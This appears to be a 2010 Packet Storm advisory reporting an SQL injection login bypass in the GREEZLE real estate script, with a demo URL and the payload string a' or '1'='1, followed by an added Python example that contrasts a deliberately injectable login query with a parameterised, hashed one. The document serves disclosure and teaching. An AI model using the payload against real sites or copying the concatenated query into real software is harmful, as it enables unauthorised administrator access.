Global Real Estate Agent Site Authentication Bypass

2010-06-12T00:00:00
ID PACKETSTORM:90525
Type packetstorm
Reporter L0rd CrusAd3r
Modified 2010-06-12T00:00:00

Description

                                        
`Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]  
Exploit Title: GREEZLE - Global Real Estate Agent Site Authentication ByPass  
Published: 2010-06-09  
Vendor URL: http://www.ifstudio.org/greezla/  
Price: 99$  
Greetz to: Sid3^effects, MaYur, M4n0j, Dark Blue™®, S1ayer and to all ICW members  
#############################################################################################################################################################################  
  
GREEZLE - Global Real Estate Agent Site Authentication ByPass  
  
#############################################################################################################################################################################  
  
Description:   
  
GREEZLE is an easy-to-use site that allows selling any real estate objects online.   
Visitors are able to browse, search and view properties.  
It lets you create accounts for agents, who can also sell real estate objects for a fee you charge.  
###############################################################################################################################################################################  
  
Vulnerability:  
  
* Authentication bypass found  
  
The provided script has an SQLi vulnerability in the admin login page  
  
DEMO URL : http://properties.ifstudio.org/en/login  
  
Use the string a' or '1'='1 for Username and Password to gain access  
  
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
# 0day no more #  
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------  
  
  
################################################################################################################################################################################  
`
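
Why the string in the advisory passes a login check, and how the check is fixed, shown as an added example that is not code from the advisory or from the vendor. The table, column names, query shape and credentials are assumptions built for this illustration, since the advisory does not show the application's code.

```python
import hashlib
import hmac
import os
import sqlite3

def hash_pw(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)

def make_db():
    # Constructed schema and data: hypothetical stand-ins for the real tables.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT PRIMARY KEY, "
               "salt BLOB, pw_hash BLOB, pw_plain TEXT)")
    salt = os.urandom(16)
    db.execute("INSERT INTO admins VALUES (?, ?, ?, ?)",
               ("admin", salt, hash_pw("S3cret-constructed", salt),
                "S3cret-constructed"))
    return db

def login_vulnerable(db, username, password):
    # Weak pattern: input is pasted into the SQL text, so a quote in the input
    # closes the string literal and the remainder is parsed as SQL. With the
    # advisory's string the WHERE clause ends in  ... or '1'='1'  and, because
    # AND binds tighter than OR, it is true for every row.
    sql = ("SELECT username FROM admins WHERE username = '" + username +
           "' AND pw_plain = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_hardened(db, username, password):
    # Placeholders keep input as data. The password is compared against a
    # salted hash in application code instead of inside the WHERE clause.
    row = db.execute(
        "SELECT username, salt, pw_hash FROM admins WHERE username = ?",
        (username,)).fetchone()
    if row is None:
        return None
    ok = hmac.compare_digest(hash_pw(password, row[1]), row[2])
    return row[0] if ok else None

if __name__ == "__main__":
    db = make_db()
    s = "a' or '1'='1"  # the string given in the advisory
    print("vulnerable:", login_vulnerable(db, s, s))
    print("hardened:  ", login_hardened(db, s, s))
    print("hardened, valid login:",
          login_hardened(db, "admin", "S3cret-constructed"))
```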